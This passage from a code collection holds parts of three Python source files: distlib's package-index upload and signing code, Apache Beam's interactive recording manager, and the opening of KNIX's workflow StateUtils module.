:param keystore: The path to a directory which contains the keys
used in verification. If not specified, the
instance's ``gpg_home`` attribute is used instead.
:return: The signing command as a list suitable to be
passed to :class:`subprocess.Popen`.
"""
cmd = [self.gpg, '--status-fd', '2', '--no-tty']
if keystore is None:
keystore = self.gpg_home
if keystore:
cmd.extend(['--homedir', keystore])
if sign_password is not None:
cmd.extend(['--batch', '--passphrase-fd', '0'])
td = tempfile.mkdtemp()
sf = os.path.join(td, os.path.basename(filename) + '.asc')
cmd.extend(['--detach-sign', '--armor', '--local-user',
signer, '--output', sf, filename])
logger.debug('invoking: %s', ' '.join(cmd))
return cmd, sf
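# A representative command returned by get_sign_command above (paths and the
# signer id are illustrative only):
#   gpg --status-fd 2 --no-tty --homedir /path/to/keys --batch
#       --passphrase-fd 0 --detach-sign --armor --local-user alice
#       --output /tmp/tmpXXXX/pkg-1.0.tar.gz.asc pkg-1.0.tar.gz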
def run_command(self, cmd, input_data=None):
"""
Run a command in a child process, passing it any input data specified.
:param cmd: The command to run.
:param input_data: If specified, this must be a byte string containing
data to be sent to the child process.
:return: A tuple consisting of the subprocess' exit code, a list of
lines read from the subprocess' ``stdout``, and a list of
lines read from the subprocess' ``stderr``.
"""
kwargs = {
'stdout': subprocess.PIPE,
'stderr': subprocess.PIPE,
}
if input_data is not None:
kwargs['stdin'] = subprocess.PIPE
stdout = []
stderr = []
p = subprocess.Popen(cmd, **kwargs)
# We don't use communicate() here because we may need to
# get clever with interacting with the command
t1 = Thread(target=self._reader, args=('stdout', p.stdout, stdout))
t1.start()
t2 = Thread(target=self._reader, args=('stderr', p.stderr, stderr))
t2.start()
if input_data is not None:
p.stdin.write(input_data)
p.stdin.close()
p.wait()
t1.join()
t2.join()
return p.returncode, stdout, stderr
def sign_file(self, filename, signer, sign_password, keystore=None):
"""
Sign a file.
:param filename: The pathname to the file to be signed.
:param signer: The identifier of the signer of the file.
:param sign_password: The passphrase for the signer's
private key used for signing.
:param keystore: The path to a directory which contains the keys
used in signing. If not specified, the instance's
``gpg_home`` attribute is used instead.
:return: The absolute pathname of the file where the signature is
stored.
"""
cmd, sig_file = self.get_sign_command(filename, signer, sign_password,
keystore)
rc, stdout, stderr = self.run_command(cmd,
sign_password.encode('utf-8'))
if rc != 0:
raise DistlibException('sign command failed with error '
'code %s' % rc)
return sig_file
def upload_file(self, metadata, filename, signer=None, sign_password=None,
filetype='sdist', pyversion='source', keystore=None):
"""
Upload a release file to the index.
:param metadata: A :class:`Metadata` instance defining at least a name
and version number for the file to be uploaded.
:param filename: The pathname of the file to be uploaded.
:param signer: The identifier of the signer of the file.
:param sign_password: The passphrase for the signer's
private key used for signing.
:param filetype: The type of the file being uploaded. This is the
distutils command which produced that file, e.g.
``sdist`` or ``bdist_wheel``.
:param pyversion: The version of Python which the release relates
to. For code compatible with any Python, this would
be ``source``, otherwise it would be e.g. ``3.2``.
:param keystore: The path to a directory which contains the keys
used in signing. If not specified, the instance's
``gpg_home`` attribute is used instead.
:return: The HTTP response received from PyPI upon submission of the
request.
"""
self.check_credentials()
if not os.path.exists(filename):
raise DistlibException('not found: %s' % filename)
metadata.validate()
d = metadata.todict()
sig_file = None
if signer:
if not self.gpg:
logger.warning('no signing program available - not signed')
else:
sig_file = self.sign_file(filename, signer, sign_password,
keystore)
with open(filename, 'rb') as f:
file_data = f.read()
md5_digest = hashlib.md5(file_data).hexdigest()
sha256_digest = hashlib.sha256(file_data).hexdigest()
d.update({
':action': 'file_upload',
'protocol_version': '1',
'filetype': filetype,
'pyversion': pyversion,
'md5_digest': md5_digest,
'sha256_digest': sha256_digest,
})
files = [('content', os.path.basename(filename), file_data)]
if sig_file:
with open(sig_file, 'rb') as f:
sig_data = f.read()
files.append(('gpg_signature', os.path.basename(sig_file),
sig_data))
shutil.rmtree(os.path.dirname(sig_file))
request = self.encode_request(d.items(), files)
return self.send_request(request)
def upload_documentation(self, metadata, doc_dir):
"""
Upload documentation to the index.
:param metadata: A :class:`Metadata` instance defining at least a name
and version number for the documentation to be
uploaded.
:param doc_dir: The pathname of the directory which contains the
documentation. This should be the directory that
contains the ``index.html`` for the documentation.
:return: The HTTP response received from PyPI upon submission of the
request.
"""
self.check_credentials()
if not os.path.isdir(doc_dir):
raise DistlibException('not a directory: %r' % doc_dir)
fn = os.path.join(doc_dir, 'index.html')
if not os.path.exists(fn):
raise DistlibException('not found: %r' % fn)
metadata.validate()
name, version = metadata.name, metadata.version
zip_data = zip_dir(doc_dir).getvalue()
fields = [(':action', 'doc_upload'),
('name', name), ('version', version)]
files = [('content', name, zip_data)]
request = self.encode_request(fields, files)
return self.send_request(request)
def get_verify_command(self, signature_filename, data_filename,
keystore=None):
"""
Return a suitable command for verifying a file.
:param signature_filename: The pathname to the file containing the
signature.
:param data_filename: The pathname to the file containing the
signed data.
:param keystore: The path to a directory which contains the keys
used in verification. If not specified, the
instance's ``gpg_home`` attribute is used instead.
:return: The verifying command as a list suitable to be
passed to :class:`subprocess.Popen`.
"""
cmd = [self.gpg, '--status-fd', '2', '--no-tty']
if keystore is None:
keystore = self.gpg_home
if keystore:
cmd.extend(['--homedir', keystore])
cmd.extend(['--verify', signature_filename, data_filename])
logger.debug('invoking: %s', ' '.join(cmd))
return cmd
def verify_signature(self, signature_filename, data_filename,
keystore=None):
"""
Verify a signature for a file.
:param signature_filename: The pathname to the file containing the
signature.
:param data_filename: The pathname to the file containing the
signed data.
:param keystore: The path to a directory which contains the keys
used in verification. If not specified, the
instance's ``gpg_home`` attribute is used instead.
:return: True if the signature was verified, else False.
"""
if not self.gpg:
raise DistlibException('verification unavailable because gpg '
'unavailable')
cmd = self.get_verify_command(signature_filename, data_filename,
keystore)
rc, stdout, stderr = self.run_command(cmd)
if rc not in (0, 1):
raise DistlibException('verify command failed with error '
'code %s' % rc)
return rc == 0
def download_file(self, url, destfile, digest=None, reporthook=None):
"""
This is a convenience method for downloading a file from a URL.
Normally, this will be a file from the index, though currently
no check is made for this (i.e. a file can be downloaded from
anywhere).
The method is just like the :func:`urlretrieve` function in the
standard library, except that it allows digest computation to be
done during download and checking that the downloaded data
matched any expected value.
:param url: The URL of the file to be downloaded (assumed to be
available via an HTTP GET request).
:param destfile: The pathname where the downloaded file is to be
saved.
:param digest: If specified, this must be a (hasher, value)
tuple, where hasher is the algorithm used (e.g.
``'md5'``) and ``value`` is the expected value.
:param reporthook: The same as for :func:`urlretrieve` in the
standard library.
"""
if digest is None:
digester = None
logger.debug('No digest specified')
else:
if isinstance(digest, (list, tuple)):
hasher, digest = digest
else:
hasher = 'md5'
digester = getattr(hashlib, hasher)()
logger.debug('Digest specified: %s' % digest)
# The following code is equivalent to urlretrieve.
# We need to do it this way so that we can compute the
# digest of the file as we go.
with open(destfile, 'wb') as dfp:
# addinfourl is not a context manager on 2.x
# so we have to use try/finally
sfp = self.send_request(Request(url))
try:
headers = sfp.info()
blocksize = 8192
size = -1
read = 0
blocknum = 0
if "content-length" in headers:
size = int(headers["Content-Length"])
if reporthook:
reporthook(blocknum, blocksize, size)
while True:
block = sfp.read(blocksize)
if not block:
break
read += len(block)
dfp.write(block)
if digester:
digester.update(block)
blocknum += 1
if reporthook:
reporthook(blocknum, blocksize, size)
finally:
sfp.close()
# check that we got the whole file, if we can
if size >= 0 and read < size:
raise DistlibException(
'retrieval incomplete: got only %d out of %d bytes'
% (read, size))
# if we have a digest, it must match.
if digester:
actual = digester.hexdigest()
if digest != actual:
raise DistlibException('%s digest mismatch for %s: expected '
'%s, got %s' % (hasher, destfile,
digest, actual))
logger.debug('Digest verified: %s', digest)
def send_request(self, req):
"""
Send a standard library :class:`Request` to PyPI and return its
response.
:param req: The request to send.
:return: The HTTP response from PyPI (a standard library HTTPResponse).
"""
handlers = []
if self.password_handler:
handlers.append(self.password_handler)
if self.ssl_verifier:
handlers.append(self.ssl_verifier)
opener = build_opener(*handlers)
return opener.open(req)
def encode_request(self, fields, files):
"""
Encode fields and files for posting to an HTTP server.
:param fields: The fields to send as a list of (fieldname, value)
tuples.
:param files: The files to send as a list of (fieldname, filename,
file_bytes) tuples.
"""
# Adapted from packaging, which in turn was adapted from
# http://code.activestate.com/recipes/146306
parts = []
boundary = self.boundary
for k, values in fields:
if not isinstance(values, (list, tuple)):
values = [values]
for v in values:
parts.extend((
b'--' + boundary,
('Content-Disposition: form-data; name="%s"' %
k).encode('utf-8'),
b'',
v.encode('utf-8')))
for key, filename, value in files:
parts.extend((
b'--' + boundary,
('Content-Disposition: form-data; name="%s"; filename="%s"' %
(key, filename)).encode('utf-8'),
b'',
value))
parts.extend((b'--' + boundary + b'--', b''))
body = b'\r\n'.join(parts)
ct = b'multipart/form-data; boundary=' + boundary
headers = {
'Content-type': ct,
'Content-length': str(len(body))
}
return Request(self.url, body, headers)
def search(self, terms, operator=None):
if isinstance(terms, string_types):
terms = {'name': terms}
rpc_proxy = ServerProxy(self.url, timeout=3.0)
try:
return rpc_proxy.search(terms, operator or 'and')
finally:
rpc_proxy('close')()
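# A minimal usage sketch of PackageIndex (credentials and file names are
# hypothetical; register/upload also require valid metadata and a reachable
# index):
#
#     index = PackageIndex()            # defaults to https://pypi.org/pypi
#     index.username = 'user'
#     index.password = 'secret'
#     index.check_credentials()
#     # response = index.upload_file(metadata, 'dist/pkg-1.0.tar.gz')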
|
recording_manager.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import logging
import threading
import time
import warnings
import pandas as pd
import apache_beam as beam
from apache_beam.dataframe.convert import to_pcollection
from apache_beam.dataframe.frame_base import DeferredBase
from apache_beam.portability.api.beam_runner_api_pb2 import TestStreamPayload
from apache_beam.runners.interactive import background_caching_job as bcj
from apache_beam.runners.interactive import interactive_environment as ie
from apache_beam.runners.interactive import interactive_runner as ir
from apache_beam.runners.interactive import pipeline_fragment as pf
from apache_beam.runners.interactive import pipeline_instrument as pi
from apache_beam.runners.interactive import utils
from apache_beam.runners.runner import PipelineState
_LOGGER = logging.getLogger(__name__)
class ElementStream:
"""A stream of elements from a given PCollection."""
def __init__(
self,
pcoll, # type: beam.pvalue.PCollection
var, # type: str
cache_key, # type: str
max_n, # type: int
max_duration_secs # type: float
):
self._pcoll = pcoll
self._cache_key = cache_key
self._pipeline = pcoll.pipeline
self._var = var
self._n = max_n
self._duration_secs = max_duration_secs
# A flag that, when True, indicates that no new elements will be yielded if
# read() is called again.
self._done = False
@property
def var(self):
# type: () -> str
"""Returns the variable named that defined this PCollection."""
return self._var
@property
def cache_key(self):
# type: () -> str
"""Returns the cache key for this stream."""
return self._cache_key
def display_id(self, suffix):
# type: (str) -> str
"""Returns a unique id able to be displayed in a web browser."""
return utils.obfuscate(self._cache_key, suffix)
def is_computed(self):
# type: () -> bool
"""Returns True if no more elements will be recorded."""
return self._pcoll in ie.current_env().computed_pcollections
def is_done(self):
# type: () -> bool
"""Returns True if no more new elements will be yielded."""
return self._done
def read(self, tail=True):
# type: (bool) -> Any
"""Reads the elements currently recorded."""
# Get the cache manager and wait until the file exists.
cache_manager = ie.current_env().get_cache_manager(self._pipeline)
# Retrieve the coder for the particular PCollection which will be used to
# decode elements read from cache.
coder = cache_manager.load_pcoder('full', self._cache_key)
# Read the elements from the cache.
# Import limiters here to prevent a circular import.
from apache_beam.runners.interactive.options.capture_limiters import CountLimiter
from apache_beam.runners.interactive.options.capture_limiters import ProcessingTimeLimiter
reader, _ = cache_manager.read('full', self._cache_key, tail=tail)
# Because a single TestStreamFileRecord can yield multiple elements, we
# limit the count again here in the to_element_list call.
#
# There are two ways of exiting this loop either a limiter was triggered or
# all elements from the cache were read. In the latter situation, it may be
# the case that the pipeline was still running. Thus, another invocation of
# `read` will yield new elements.
count_limiter = CountLimiter(self._n)
time_limiter = ProcessingTimeLimiter(self._duration_secs)
limiters = (count_limiter, time_limiter)
for e in utils.to_element_list(reader,
coder,
include_window_info=True,
n=self._n,
include_time_events=True):
# From the to_element_list we either get TestStreamPayload.Events if
# include_time_events or decoded elements from the reader. Make sure we
# only count the decoded elements to break early.
if isinstance(e, TestStreamPayload.Event):
time_limiter.update(e)
else:
count_limiter.update(e)
yield e
if any(l.is_triggered() for l in limiters):
break
# A triggered limiter means that the user's request has been fulfilled, so
# reading from the cache again won't yield any new elements. The same holds
# once the user pipeline has terminated.
if any(l.is_triggered()
for l in limiters) or ie.current_env().is_terminated(self._pipeline):
self._done = True
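# A standalone sketch of the limiter pattern ElementStream.read() uses above:
# stop consuming a stream once either an element-count budget or a wall-clock
# budget is exhausted. Generic illustration only; `max_n` and `max_secs` are
# placeholder names, not Beam APIs.
#
#     import time
#
#     def read_limited(source, max_n, max_secs):
#         start = time.time()
#         for count, element in enumerate(source, 1):
#             yield element
#             if count >= max_n or time.time() - start >= max_secs:
#                 break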
class Recording:
"""A group of PCollections from a given pipeline run."""
def __init__(
self,
user_pipeline, # type: beam.Pipeline
pcolls, # type: List[beam.pvalue.PCollection]
result, # type: beam.runner.PipelineResult
pipeline_instrument, # type: beam.runners.interactive.PipelineInstrument
max_n, # type: int
max_duration_secs, # type: float
):
self._user_pipeline = user_pipeline
self._result = result
self._result_lock = threading.Lock()
self._pcolls = pcolls
pcoll_var = lambda pcoll: pipeline_instrument.cacheable_var_by_pcoll_id(
pipeline_instrument.pcolls_to_pcoll_id.get(str(pcoll), None))
self._streams = {
pcoll: ElementStream(
pcoll,
pcoll_var(pcoll),
pipeline_instrument.cache_key(pcoll),
max_n,
max_duration_secs)
for pcoll in pcolls
}
self._start = time.time()
self._duration_secs = max_duration_secs
self._set_computed = bcj.is_cache_complete(str(id(user_pipeline)))
# Run a separate thread for marking the PCollections done. This is because
# the pipeline run may be asynchronous.
self._mark_computed = threading.Thread(target=self._mark_all_computed)
self._mark_computed.daemon = True
self._mark_computed.start()
def _mark_all_computed(self):
# type: () -> None
"""Marks all the PCollections upon a successful pipeline run."""
if not self._result:
return
while not PipelineState.is_terminal(self._result.state):
with self._result_lock:
bcj = ie.current_env().get_background_caching_job(self._user_pipeline)
if bcj and bcj.is_done():
self._result.wait_until_finish()
elif time.time() - self._start >= self._duration_secs:
self._result.cancel()
self._result.wait_until_finish()
elif all(s.is_done() for s in self._streams.values()):
self._result.cancel()
self._result.wait_until_finish()
time.sleep(0.1)
# Mark the PCollections as computed so that Interactive Beam doesn't need to
# re-compute them.
if self._result.state is PipelineState.DONE and self._set_computed:
ie.current_env().mark_pcollection_computed(self._pcolls)
def is_computed(self):
# type: () -> bool
"""Returns True if all PCollections are computed."""
return all(s.is_computed() for s in self._streams.values())
def stream(self, pcoll):
# type: (beam.pvalue.PCollection) -> ElementStream
"""Returns an ElementStream for a given PCollection."""
return self._streams[pcoll]
def computed(self):
# type: () -> dict
"""Returns all computed ElementStreams."""
return {p: s for p, s in self._streams.items() if s.is_computed()}
def uncomputed(self):
# type: () -> dict
"""Returns all uncomputed ElementStreams."""
return {p: s for p, s in self._streams.items() if not s.is_computed()}
def cancel(self):
# type: () -> None
"""Cancels the recording."""
with self._result_lock:
self._result.cancel()
def wait_until_finish(self):
# type: () -> None
"""Waits until the pipeline is done and returns the final state.
This also marks any PCollections as computed right away if the pipeline is
successful.
"""
if not self._result:
return beam.runners.runner.PipelineState.DONE
self._mark_computed.join()
return self._result.state
def describe(self):
# type: () -> dict[str, int]
"""Returns a dictionary describing the cache and recording."""
cache_manager = ie.current_env().get_cache_manager(self._user_pipeline)
size = sum(
cache_manager.size('full', s.cache_key) for s in self._streams.values())
return {'size': size, 'duration': self._duration_secs}
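# A standalone sketch of the completion-watcher pattern Recording uses above:
# a daemon thread polls an asynchronous result and invokes a callback once it
# reaches a terminal state. Names are generic placeholders, not Beam APIs.
#
#     import threading, time
#
#     def watch_until_done(is_terminal, on_done, poll_secs=0.1):
#         def _poll():
#             while not is_terminal():
#                 time.sleep(poll_secs)
#             on_done()
#         t = threading.Thread(target=_poll, daemon=True)
#         t.start()
#         return t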
class RecordingManager:
"""Manages recordings of PCollections for a given pipeline."""
def __init__(self, user_pipeline, pipeline_var=None, test_limiters=None):
# type: (beam.Pipeline, str, list[Limiter]) -> None
self.user_pipeline = user_pipeline # type: beam.Pipeline
self.pipeline_var = pipeline_var if pipeline_var else '' # type: str
self._recordings = set() # type: set[Recording]
self._start_time_sec = 0 # type: float
self._test_limiters = test_limiters if test_limiters else []
def _watch(self, pcolls):
# type: (List[beam.pvalue.PCollection]) -> None
"""Watch any pcollections not being watched.
This allows for the underlying caching layer to identify the PCollection as
something to be cached.
"""
watched_pcollections = set()
watched_dataframes = set()
for watching in ie.current_env().watching():
for _, val in watching:
if isinstance(val, beam.pvalue.PCollection):
watched_pcollections.add(val)
elif isinstance(val, DeferredBase):
watched_dataframes.add(val)
# Convert them one-by-one to generate a unique label for each. This allows
# caching at a finer granularity.
#
# TODO(BEAM-12388): investigate the mixing pcollections in multiple
# pipelines error when using the default label.
for df in watched_dataframes:
pcoll = to_pcollection(df, yield_elements='pandas', label=str(df._expr))
watched_pcollections.add(pcoll)
for pcoll in pcolls:
if pcoll not in watched_pcollections:
ie.current_env().watch(
{'anonymous_pcollection_{}'.format(id(pcoll)): pcoll})
def _clear(self, pipeline_instrument):
# type: (pi.PipelineInstrument) -> None
"""Clears the recording of all non-source PCollections."""
cache_manager = ie.current_env().get_cache_manager(self.user_pipeline)
# Only clear the PCollections that aren't being populated from the
# BackgroundCachingJob.
computed = ie.current_env().computed_pcollections
cacheables = [
c for c in pipeline_instrument.cacheables.values()
if c.pcoll.pipeline is self.user_pipeline and c.pcoll not in computed
]
all_cached = set(str(c.to_key()) for c in cacheables)
source_pcolls = getattr(cache_manager, 'capture_keys', set())
to_clear = all_cached - source_pcolls
self._clear_pcolls(cache_manager, set(to_clear))
def _clear_pcolls(self, cache_manager, pcolls):
for pc in pcolls:
cache_manager.clear('full', pc)
def clear(self):
# type: () -> None
"""Clears all cached PCollections for this RecordingManager."""
cache_manager = ie.current_env().get_cache_manager(self.user_pipeline)
if cache_manager:
cache_manager.cleanup()
def cancel(self):
# type: () -> None
"""Cancels the current background recording job."""
bcj.attempt_to_cancel_background_caching_job(self.user_pipeline)
for r in self._recordings:
r.wait_until_finish()
self._recordings = set()
# The recordings rely on a reference to the BCJ to correctly finish. So we
# evict the BCJ after they complete.
ie.current_env().evict_background_caching_job(self.user_pipeline)
def describe(self):
# type: () -> dict[str, int]
"""Returns a dictionary describing the cache and recording."""
cache_manager = ie.current_env().get_cache_manager(self.user_pipeline)
capture_size = getattr(cache_manager, 'capture_size', 0)
descriptions = [r.describe() for r in self._recordings]
size = sum(d['size'] for d in descriptions) + capture_size
start = self._start_time_sec
bcj = ie.current_env().get_background_caching_job(self.user_pipeline)
if bcj:
state = bcj.state
else:
state = PipelineState.STOPPED
return {
'size': size,
'start': start,
'state': state,
'pipeline_var': self.pipeline_var
}
def record_pipeline(self):
# type: () -> bool
"""Starts a background caching job for this RecordingManager's pipeline."""
runner = self.user_pipeline.runner
if isinstance(runner, ir.InteractiveRunner):
runner = runner._underlying_runner
# Make sure that sources without a user reference are still cached.
ie.current_env().add_user_pipeline(self.user_pipeline)
pi.watch_sources(self.user_pipeline)
# Attempt to run background caching job to record any sources.
if ie.current_env().is_in_ipython:
warnings.filterwarnings(
'ignore',
'options is deprecated since First stable release. References to '
'<pipeline>.options will not be supported',
category=DeprecationWarning)
if bcj.attempt_to_run_background_caching_job(
runner,
self.user_pipeline,
options=self.user_pipeline.options,
limiters=self._test_limiters):
self._start_time_sec = time.time()
return True
return False
def record(self, pcolls, max_n, max_duration):
# type: (List[beam.pvalue.PCollection], int, Union[int,str]) -> Recording
"""Records the given PCollections."""
# Assert that all PCollections come from the same user_pipeline.
for pcoll in pcolls:
assert pcoll.pipeline is self.user_pipeline, (
'{} belongs to a different user-defined pipeline ({}) than that of'
' other PCollections ({}).'.format(
pcoll, pcoll.pipeline, self.user_pipeline))
if isinstance(max_duration, str) and max_duration != 'inf':
max_duration_secs = pd.to_timedelta(max_duration).total_seconds()
else:
max_duration_secs = max_duration
# Make sure that all PCollections to be shown are watched. If a PCollection
# has not been watched, make up a variable name for that PCollection and
# watch it. No validation is needed here because the watch logic can handle
# arbitrary variables.
self._watch(pcolls)
pipeline_instrument = pi.PipelineInstrument(self.user_pipeline)
self.record_pipeline()
# Get the subset of computed PCollections. These do not need to be recomputed.
computed_pcolls = set(
pcoll for pcoll in pcolls
if pcoll in ie.current_env().computed_pcollections)
# Start a pipeline fragment to start computing the PCollections.
uncomputed_pcolls = set(pcolls).difference(computed_pcolls)
if uncomputed_pcolls:
# Clear the cache of the given uncomputed PCollections because they are
# incomplete.
self._clear(pipeline_instrument)
warnings.filterwarnings(
'ignore',
'options is deprecated since First stable release. References to '
'<pipeline>.options will not be supported',
category=DeprecationWarning)
pf.PipelineFragment(list(uncomputed_pcolls),
self.user_pipeline.options).run()
result = ie.current_env().pipeline_result(self.user_pipeline)
else:
result = None
recording = Recording(
self.user_pipeline,
pcolls,
result,
pipeline_instrument,
max_n,
max_duration_secs)
self._recordings.add(recording)
return recording
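# Illustrative end-to-end usage of the class above, hedged and based only on
# the methods defined in this file (not on any documented public API); the
# variables `user_pipeline` and `pcoll` are assumed to already exist:
#
#     rm = RecordingManager(user_pipeline, pipeline_var='p')
#     recording = rm.record([pcoll], max_n=100, max_duration='60s')
#     stream = recording.stream(pcoll)
#     elements = list(stream.read(tail=False))
#     recording.wait_until_finish()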
|
StateUtils.py
|
# Copyright 2020 The KNIX Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import ast
import copy
from datetime import datetime
import json
import socket
import time
import threading
import anytree
from thriftpy2.transport import TFramedTransportFactory, TServerSocket
from thriftpy2.protocol import TCompactProtocolFactory
from thriftpy2.server import TSimpleServer
from thriftpy2.thrift import TProcessor
from ujsonpath import parse, tokenize
import py3utils
from DataLayerClient import DataLayerClient
class StateUtils:
defaultStateType = 'Task_SAND'
taskStateType = 'Task'
choiceStateType = 'Choice'
passStateType = 'Pass'
succeedStateType = 'Succeed'
failStateType = 'Fail'
waitStateType = 'Wait'
parallelStateType = 'Parallel'
mapStateType = 'Map'
mapFunctionOutput = {}
def __init__(self, functionstatetype=defaultStateType, functionstatename='', functionstateinfo='{}', functionruntime="", logger=None, workflowid=None, sandboxid=None, functiontopic=None, datalayer=None, storage_userid=None, internal_endpoint=None):
self.operators = ['And', 'BooleanEquals', 'Not', 'NumericEquals', 'NumericGreaterThan', 'NumericGreaterThanEquals',\
'NumericLessThan', 'NumericLessThanEquals', 'Or', 'StringEquals', 'StringGreaterThan',\
'StringGreaterThanEquals', 'StringLessThan', 'StringLessThanEquals', 'TimestampEquals', 'TimestampGreaterThan',\
'TimestampGreaterThanEquals', 'TimestampLessThan', 'TimestampLessThanEquals']
self.operators_python = ['and', '==', 'not', '==', '>', '>=', '<', '<=', 'or', '==', '>', '>=', '<', '<=', '==', '>', '>=', '<', '<=']
self.operators_set = set(self.operators)
self.asl_errors = ("States.ALL", "States.Timeout", "States.TaskFailed", "States.Permissions", "States.ResultPathMatchFailure", "States.BranchFailed", "States.NoChoiceMatched")
self.nodelist = []
self.parsed_trees = []
self.default_next_choice = []
self.input_path_dict = {}
self.items_path_dict = {}
self.result_path_dict = {}
self.output_path_dict = {}
self.parameters_dict = {}
self.functionstatetype = functionstatetype
self.functionstatename = functionstatename
self.functionstateinfo = functionstateinfo
self.functiontopic = functiontopic
self._datalayer = datalayer
self._storage_userid = storage_userid
self._internal_endpoint = internal_endpoint
self._function_runtime = functionruntime
if self._function_runtime == "java":
# if java, this is the address we'll send requests to be handled
self._java_handler_address = "/tmp/java_handler_" + self.functionstatename + ".uds"
self.parsedfunctionstateinfo = {}
self.workflowid = workflowid
self.sandboxid = sandboxid
self.choiceNext = ''
self.mapStateCounter = 0
self.evaluateCounter = 0
self.catcher_list = []
self.retry_list = []
self._logger = logger
self.parse_function_state_info()
self.function_output_batch_list = []
self.tobeProcessedlater = []
self.outputMapStatebatch = []
self.mapPartialResult = {}
def call_counter(func):
def helper(*args, **kwargs):
helper.calls += 1
return func(*args, **kwargs)
helper.calls = 0
helper.__name__= func.__name__
return helper
# find target next for error in catcher list
def find_cat_data(self, err, cat_list):
cat_result = "$" # default
cat_next = [] # default
for cat in cat_list:
if "ErrorEquals" in cat and (str(err) in cat["ErrorEquals"] or err.__class__.__name__ in cat["ErrorEquals"]):
cat_next = cat['Next']
if "ResultPath" in cat:
cat_result = cat['ResultPath']
return cat_next, cat_result
def find_ret_data(self, err, ret_list):
ret_max_attempts = 1 # default
ret_interval_seconds = 1 # default
ret_backoff_rate = 1.0 # default
for ret in ret_list:
if str(err) in ret['ErrorEquals'] or err.__class__.__name__ in ret['ErrorEquals']:
if "MaxAttempts" in list(ret.keys()):
ret_max_attempts = ret['MaxAttempts']
if "IntervalSeconds" in list(ret.keys()):
ret_interval_seconds = ret['IntervalSeconds']
if "BackoffRate" in list(ret.keys()):
ret_backoff_rate = ret['BackoffRate']
return ret_max_attempts, ret_interval_seconds, ret_backoff_rate
def isMapState(self):
return self.functionstatetype == StateUtils.mapStateType
def isTaskState(self):
return self.functionstatetype == StateUtils.taskStateType or self.functionstatetype == StateUtils.defaultStateType
def applyParameters(self, raw_state_input):
#2c. Apply Parameters, if available and applicable (The Parameters field is used in Map to select values in the input)
# in = raw_state_input
# if Parameters:
# in = values selected from raw_state_input via Parameters
#
try:
function_input = raw_state_input
self._logger.debug("inside applyParameters: " + str(self.parameters_dict) + ", raw_state_input: " + str(raw_state_input))
if self.parameters_dict:
function_input = self.process_parameters(self.parameters_dict, function_input)
return function_input
except Exception:
raise Exception("Parameters processing exception")
def applyItemsPath(self, raw_state_input):
#2a. Apply ItemsPath, if available and applicable (The ItemsPath field is used in Map to select an array in the input)
# in = raw_state_input
# if ItemsPath:
# in = raw_state_input[ItemsPath]
#
try:
function_input = raw_state_input
if self.items_path_dict and 'ItemsPath' in self.items_path_dict:
function_input = self.process_items_path(self.items_path_dict, function_input)
return function_input
except Exception:
raise Exception("Items path processing exception")
def applyInputPath(self, raw_state_input):
#2. Apply InputPath, if available (Extract function_input from raw_state_input)
# in = raw_state_input
# if InputPath:
# in = raw_state_input[InputPath]
#
try:
function_input = raw_state_input
if self.input_path_dict and 'InputPath' in self.input_path_dict:
function_input = self.process_input_path(self.input_path_dict, function_input)
return function_input
except Exception:
raise Exception("Input path processing exception")
# send a request to the java worker and get the result
def _send_java_request(self, java_input, java_output, api_server, server_socket):
# get a connection to the java worker
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
# send the request
max_num_tries = 10
num_tries = 0
trying = True
has_error = False
while trying:
try:
sock.connect(self._java_handler_address)
trying = False
except socket.error as msg:
num_tries += 1
if num_tries > max_num_tries:
self._logger.debug("cannot open connection to java worker: %s", msg)
trying = False
has_error = True
else:
self._logger.debug("will retry connection to java worker...")
time.sleep(0.05*num_tries)
if not has_error:
try:
sock.sendall(java_input.encode())
sock.shutdown(socket.SHUT_WR)
# receive the response
chunks = []
while True:
data = sock.recv(4096)
if not data:
sock.close()
break
chunks.append(data.decode())
output_data = "".join(chunks)
self._logger.debug("received output_data: " + output_data)
output_data = json.loads(output_data)
if not output_data["hasError"]:
java_output["functionResult"] = output_data["functionResult"]
java_output["hasError"] = False
java_output["errorType"] = ""
java_output["errorTrace"] = ""
else:
java_output["hasError"] = output_data["hasError"]
java_output["errorType"] = output_data["errorType"]
java_output["errorTrace"] = output_data["errorTrace"]
# close the api server in the main thread, so that we can continue with publishing the output
api_server.close()
server_socket.close()
except socket.error as msg:
self._logger.debug("cannot send request to java worker: %s", msg)
#os._exit(1)
def _exec_function(self, runtime, exec_arguments, sapi):
if runtime == "python 3.6":
func = exec_arguments["function"]
args = exec_arguments["function_input"]
function_output = func(args, sapi)
elif runtime == "java":
# open the API server for this request
api_uds = exec_arguments["api_uds"]
thriftAPIService = exec_arguments["thriftAPIService"]
java_input = exec_arguments["function_input"]
processor = TProcessor(thriftAPIService, sapi)
server_socket = TServerSocket(unix_socket=api_uds)
# no need for any other type of server; there will only be a single client: the java function instance
api_server = TSimpleServer(processor, server_socket,
iprot_factory=TCompactProtocolFactory(),
itrans_factory=TFramedTransportFactory())
self._logger.debug("API server at: " + api_uds)
self._logger.debug("starting with java_input: " + java_input)
# access to the output for the thread via an object
java_output = {}
# send it to the java worker in a thread
# (thread has access to api_server object and server_socket to stop it)
# (thread has also access to the output to set it in the main thread of execution)
try:
t = threading.Thread(target=self._send_java_request, args=(java_input, java_output, api_server, server_socket,))
t.start()
except Exception as exc:
pass
# meanwhile, the main thread listens and serves API requests
# when the execution is finished, the api server will be stopped
try:
self._logger.debug("API server serving...")
api_server.serve()
except Exception as exc:
#raise exc
pass
# when the java worker function returns, it stops the API server and sets the output that was produced
# get the output
has_error = java_output["hasError"]
error_type = java_output["errorType"]
error_trace = java_output["errorTrace"]
if not has_error:
function_output = java_output["functionResult"]
else:
raise Exception(error_type)
return function_output
